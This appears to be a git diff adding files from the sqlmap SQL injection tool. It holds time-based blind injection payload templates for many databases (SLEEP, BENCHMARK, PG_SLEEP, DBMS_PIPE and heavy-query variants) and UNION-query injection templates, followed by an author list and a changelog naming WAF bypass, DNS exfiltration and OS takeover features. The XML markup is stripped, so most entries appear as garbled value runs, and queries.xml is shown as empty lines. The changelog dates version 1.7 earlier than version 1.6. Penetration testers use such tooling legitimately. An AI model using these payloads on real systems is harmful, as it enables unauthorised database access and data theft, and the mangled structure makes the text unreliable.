+ + + SAP MaxDB time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,3,9 + 3 + (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + IBM DB2 time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + + HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB > 2.0 time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + Informix time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
+ + + + + MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP) + 5 + 3 + 1 + 2,3 + 1 + ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;) + + ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE) + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0))) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0))) + + + + +
+ HSQLDB + > 2.0 +
+
+ + +
diff --git a/src/sqlmap-master/data/xml/payloads/union_query.xml b/src/sqlmap-master/data/xml/payloads/union_query.xml new file mode 100644 index 0000000..9513892 --- /dev/null +++ b/src/sqlmap-master/data/xml/payloads/union_query.xml @@ -0,0 +1,742 @@ + + + + + + Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query ([CHAR]) - 1 to 10 columns + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 1-10 + + + + + + + + Generic UNION query (NULL) - 1 to 10 columns + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 1-10 + + + + + + + + Generic UNION query ([RANDNUM]) - 1 to 10 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 1-10 + + + + + + + + Generic UNION query ([CHAR]) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 11-20 + + + + + + + + Generic UNION query (NULL) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 11-20 + + + + + + + + Generic UNION query ([RANDNUM]) - 11 to 20 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 11-20 + + + + + + + + Generic UNION query ([CHAR]) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 21-30 + + + + + + + + Generic UNION query (NULL) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 21-30 + + + + + + + + Generic UNION query ([RANDNUM]) - 21 to 30 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 21-30 + + + + + + + + Generic UNION query ([CHAR]) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 31-40 + + + + + + + + Generic UNION query (NULL) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 31-40 + + + + + + + + Generic UNION query ([RANDNUM]) - 31 to 40 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 31-40 + + + + + + + + Generic UNION query ([CHAR]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 41-50 + + + + + + + Generic UNION query (NULL) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 41-50 + + + + + + + + Generic UNION query ([RANDNUM]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 41-50 + + + + + + + + MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 1 to 10 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 1 to 10 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 1 to 10 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 11 to 20 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 21-30 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 21-30 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 21 to 30 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 21-30 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 31 to 40 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 41-50 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 41-50 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 41-50 + + + + +
+ MySQL +
+
+ +
diff --git a/src/sqlmap-master/data/xml/queries.xml b/src/sqlmap-master/data/xml/queries.xml new file mode 100644 index 0000000..28b5582 --- /dev/null +++ b/src/sqlmap-master/data/xml/queries.xml @@ -0,0 +1,1788 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + /> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/doc/AUTHORS b/src/sqlmap-master/doc/AUTHORS new file mode 100644 index 0000000..300711a --- /dev/null +++ b/src/sqlmap-master/doc/AUTHORS @@ -0,0 +1,7 @@ +Bernardo Damele Assumpcao Guimaraes (@inquisb) + + +Miroslav Stampar (@stamparm) + + +You can contact both developers by writing to dev@sqlmap.org diff --git a/src/sqlmap-master/doc/CHANGELOG.md b/src/sqlmap-master/doc/CHANGELOG.md new file mode 100644 index 0000000..a6c344a --- /dev/null +++ b/src/sqlmap-master/doc/CHANGELOG.md @@ -0,0 +1,403 @@ +# Version 1.7 (2022-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1) + +# Version 1.6 (2022-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1) + +# Version 1.5 (2021-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1) + +# Version 1.4 (2020-01-01) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1) + +# Version 1.3 (2019-01-05) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1) + +# Version 1.2 (2018-01-08) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1) + +# Version 1.1 (2017-04-07) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1) + +# Version 1.0 (2016-02-27) + +* Implemented support for automatic decoding of page content through detected charset. +* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). +* Major improvements to program stabilization based on user reports. +* Added new tampering scripts avoiding popular WAF/IPS mechanisms. +* Fixed major bug with DNS leaking in Tor mode. +* Added wordlist compilation made of the most popular cracking dictionaries. +* Implemented multi-processor hash cracking routine(s). +* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method. +* Old resume files are now deprecated and replaced by faster SQLite based session mechanism. +* Substantial code optimization and smaller memory footprint. +* Added option `-m` for scanning multiple targets enlisted in a given textual file. +* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form. +* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests. +* Added option `--host` for manually setting HTTP Host header value. +* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself. +* Added option `--skip` for skipping tests for given parameter(s). +* Added switch `--titles` for comparing pages based only on their titles. +* Added option `--charset` for forcing character encoding used for data retrieval. +* Added switch `--check-tor` for checking if Tor is used properly. +* Added option `--crawl` for multithreaded crawling of a given website starting from the target url. +* Added option `--csv-del` for manually setting delimiting character used in CSV output. +* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval. +* Added switch `--smart` for conducting through tests only in case of positive heuristic(s). +* Added switch `--check-waf` for checking of existence of WAF/IPS protection. +* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. +* Added switch `--count` to count the number of entries for a specific table or all database(s) tables. +* Major improvements to switches `--tables` and `--columns`. +* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof. +* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header. +* Added switch `-a` to enumerate all DBMS data. +* Added option `--alert` to run host OS command(s) when SQL injection is found. +* Added option `--answers` to set user answers to asked questions during sqlmap run. +* Added option `--auth-file` to set HTTP authentication PEM cert/private key file. +* Added option `--charset` to force character encoding used during data retrieval. +* Added switch `--check-tor` to force checking of proper usage of Tor. +* Added option `--code` to set HTTP code to match when query is evaluated to True. +* Added option `--cookie-del` to set character to be used while splitting cookie values. +* Added option `--crawl` to set the crawling depth for the website starting from the target URL. +* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`). +* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token. +* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token. +* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`). +* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password). +* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies. +* Added switch `--disable-coloring` to disable console output coloring. +* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s). +* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`). +* Added option `--eval` for setting the Python code that will be evaluated before the request. +* Added switch `--force-ssl` to force usage of SSL/HTTPS. +* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval. +* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`). +* Added switch `-hh` for showing advanced help message. +* Added option `--host` to set the HTTP Host header value. +* Added switch `--hostname` to turn on retrieval of DBMS server hostname. +* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. +* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection. +* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). +* Added switch `--invalid-bignum` for usage of big numbers while invalidating values. +* Added switch `--invalid-logical` for usage of logical operations while invalidating values. +* Added switch `--invalid-string` for usage of random strings while invalidating values. +* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format. +* Added option `-m` to set the textual file holding multiple targets for scanning purposes. +* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`). +* Added switch `--no-cast` for turning off payload casting mechanism. +* Added switch `--no-escape` for turning off string escaping mechanism. +* Added option `--not-string` for setting string to be matched when query is evaluated to False. +* Added switch `--offline` to force work in offline mode (i.e. only use session data). +* Added option `--output-dir` to set custom output directory path. +* Added option `--param-del` to set character used for splitting parameter values. +* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing). +* Added option `--proxy-file` to set file holding proxy list. +* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory. +* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run. +* Added option `--safe-post` to set POST data for sending to safe URL. +* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL. +* Added option `--skip` to skip testing of given parameter(s). +* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic. +* Added switch `--skip-urlencode` to skip URL encoding of payload data. +* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection. +* Added switch `--smart` to conduct thorough tests only if positive heuristic(s). +* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). +* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. +* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`). +* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`). +* Added switch `--titles` to turn on comparison of pages based only on their titles. +* Added option `--tor-port` to explicitly set Tor proxy port. +* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`). +* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection. +* Added option `--where` to set `WHERE` condition to be used during the table dumping. +* Added option `-X` to exclude DBMS database table column(s) from enumeration. +* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing. +* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`). + +# Version 0.9 (2011-04-10) + +* Rewritten SQL injection detection engine. +* Support to directly connect to the database without passing via a SQL injection, option `-d`. +* Added full support for both time-based blind SQL injection and error-based SQL injection techniques. +* Implemented support for SQLite 2 and 3. +* Implemented support for Firebird. +* Implemented support for Microsoft Access, Sybase and SAP MaxDB. +* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`. +* Added support to tamper injection data with option `--tamper`. +* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack. +* Added support to enumerate roles on Oracle, `--roles` switch. +* Added support for SOAP based web services requests. +* Added support to fetch unicode data. +* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`. +* Implemented several optimization switches to speed up the exploitation of SQL injections. +* Support to test and inject against HTTP Referer header. +* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`. +* Implemented feature to speedup the enumeration of table names. +* Support for customizable HTTP(s) redirections. +* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`. +* Support to parse and test forms on target url, switch `--forms`. +* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL. +* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection. +* Added safe URL feature, `--safe-url` and `--safe-freq`. +* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content. +* Implemented few other features and switches. +* Over 100 bugs fixed. +* Major code refactoring. +* User's manual updated. + +# Version 0.8 (2010-03-14) + +* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials. +* 